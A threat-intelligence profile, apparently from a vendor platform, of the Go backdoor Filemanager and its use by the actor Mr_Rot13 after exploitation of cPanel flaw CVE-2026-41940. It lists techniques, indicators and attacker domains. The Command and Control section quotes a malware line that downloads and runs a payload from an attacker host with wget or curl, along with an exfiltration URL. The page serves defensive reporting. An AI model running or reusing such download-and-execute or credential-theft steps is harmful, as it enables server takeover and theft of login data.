filemanager
Filemanager is a cross-platform remote-control trojan/backdoor written in Go that supports Darwin, Linux, and Windows. In the reported campaign, it was deployed after exploitation of the critical cPanel/WHM authentication-bypass vulnerability CVE-2026-41940, primarily against compromised Linux hosting environments. The intrusion chain described in the content includes automated exploitation of the cPanel flaw, installation of SSH persistence, deployment of a PHP webshell, hijacking of cPanel login pages with malicious JavaScript to steal credentials, collection of bash history, SSH data, device information, database passwords, and valiases data, and then installation of Filemanager for persistent remote access. Filemanager exposes a web-based management interface on an attacker-specified port and provides remote administration capabilities including file management, remote command execution, and shell access. The activity is attributed by researchers to the threat actor Mr_Rot13, which used infrastructure including wpsock.com to install Filemanager, alongside wrned.com and cp.dene.de.com in the broader campaign. A Linux AMD64 Filemanager sample is reported with MD5 9305b4ebbb4d39907cf36b62989a6af3.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The campaign uses an automated infection chain that implants SSH keys, drops a PHP webshell, hijacks login pages, steals credentials, and installs the Filemanager backdoor.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The campaign uses an automated infection chain that implants SSH keys, drops a PHP webshell, hijacks login pages, steals credentials, and installs the Filemanager backdoor.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
3 techniques
Execution
The backdoor supports file management, remote command execution, and shell functionality.
Persistence
5 techniques
Persistence
they deploy an “infector” that first changes the server’s root password and plants a hidden login key so attackers can return via SSH
SSH Implantation: The infector hardcodes a new root password and plants an attacker-controlled SSH public key, ensuring persistent privileged access.
This vulnerability allows for authentication bypass and grants remote attackers elevated control over the control panel.
Privilege Escalation
3 techniques
Privilege Escalation
CVE-2026-41940 is a high-severity unauthenticated authentication bypass vulnerability affecting cPanel & WHM... an attacker can remotely bypass authentication and take over the cPanel / WHM control panel, allowing an unauthenticated remote attacker to gain administrator privileges on the affected server.
Stealth
2 techniques
Stealth
Credential Access
3 techniques
Credential Access
This web shell facilitates file management and remote command execution, and is used to inject JavaScript code that steals login credentials
Collection
3 techniques
Collection
The infector also collects sensitive information, such as bash history, SSH data, and database passwords
Command and Control
4 techniques
Command and Control
sends them to an attacker-controlled server... data is exfiltrated both to the attackers’ own servers and to a private Telegram group
The C2 responds with a JSON object... reports key parameters... back to the C2 address https://wrned.]com/api.php?t=3&c=1 ... sends this sensitive data via an AJAX request to a remote server controlled by the attackers.
Its function is to request a malicious payload named Update from the download server cp.dene.[de.com , and run it continuously in the background using the nohup command... wget -q -O "$F" 'https://cp.dene.[de.com/Update' ... || curl -sk -o "$F" 'https://cp.dene.[de.com/Update'
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A backdoor installed in the Mr_Rot13 campaign following exploitation of CVE-2026-41940.
A backdoor/web shell deployed on compromised cPanel systems that enables file management and remote command execution, supports credential theft via injected JavaScript, and is part of a broader cross-platform compromise workflow.
A backdoor/remote-control trojan deployed on compromised cPanel servers to provide persistent unauthorized access. It is delivered by the Go-based Payload malware and used after exploitation of cPanel to maintain control over victims.
A cross-platform remote-access backdoor written in Go with builds for Linux, Windows, and macOS. It exposes a web-based management console, supports file management, remote command execution, interactive shell access, steals credentials, and helps maintain persistent access.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.